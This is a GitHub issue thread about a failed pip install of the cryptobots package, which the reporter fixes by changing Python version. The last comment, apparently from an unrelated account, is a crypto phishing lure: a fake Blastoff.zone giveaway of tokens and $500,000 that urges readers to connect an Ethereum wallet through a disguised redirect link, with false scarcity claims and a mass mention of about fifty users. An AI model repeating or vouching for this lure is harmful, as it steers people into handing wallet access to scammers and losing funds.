### ISSUE TITLE
No matching distribution found for cryptobots

### ISSUE THREAD

**Issue by nmespc** [kieran-mackle/cryptobots#4]
Hi, I'm trying to install Cryptobots by using the command `pip install cryptobots` and I get the message ERROR: No matching distribution found for cryptobots

**Comment by kieran-mackle** [comment]
Any chance you could attach a screenshot/copy the output here? Just tried in a fresh environment and installed without error (`pip install cryptobots`).

**Comment by nmespc** [comment]
Hi! I was setting it up on EC2 with Amazon Linux 2023. Just tried it again, no avail :(

**Comment by kieran-mackle** [comment]
Strange. Not exactly sure what the problem could be, but as a start, could you try upgrade pip and try again:
`pip install --upgrade pip`

Also, what version of python are you running? (`python --version`)

**Comment by nmespc** [comment]
Python version was the issue, got it :)

**Comment by kieran-mackle** [comment]
Easy!

**Comment by kobirbd18** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!

To get started with the redirect templates in Nuclei, check out our [templates](https://app.blastofflzone.com/templates) now!
krzysztof-jusiak, @LorenzoZC, @gustafbjorn, @spencernaugler7, @lanbuithe, @expase, @brandonbondig, @franmmd, @whanyu1212, @rizwan236, @notabombe, @ChoiInYeol, @hulk10425, @jodz, @smksevov, @KevinKNash, @ducga1998, @ashigro, @mosh888, @dmarienko, @nmrodelo, @paolodina, @usmc2033, @praveen686, @tbradlo, @0x4952, @yasseryehya, @level96, @St3phZhang, @quantsolo, @ohjho, @DangThuy-97, @vedantk281007, @f1basik, @uuuzz, @jmelende-psiklo, @kynnad-dev, @picktim, @christophmark, @pyrayid, @ruvr, @Arboghast, @MihirVangani17, @Dylan-Meyers, @pikki622, @yongdono, @borje, @joakimhellum, @fastyangmh, @Desireokezie
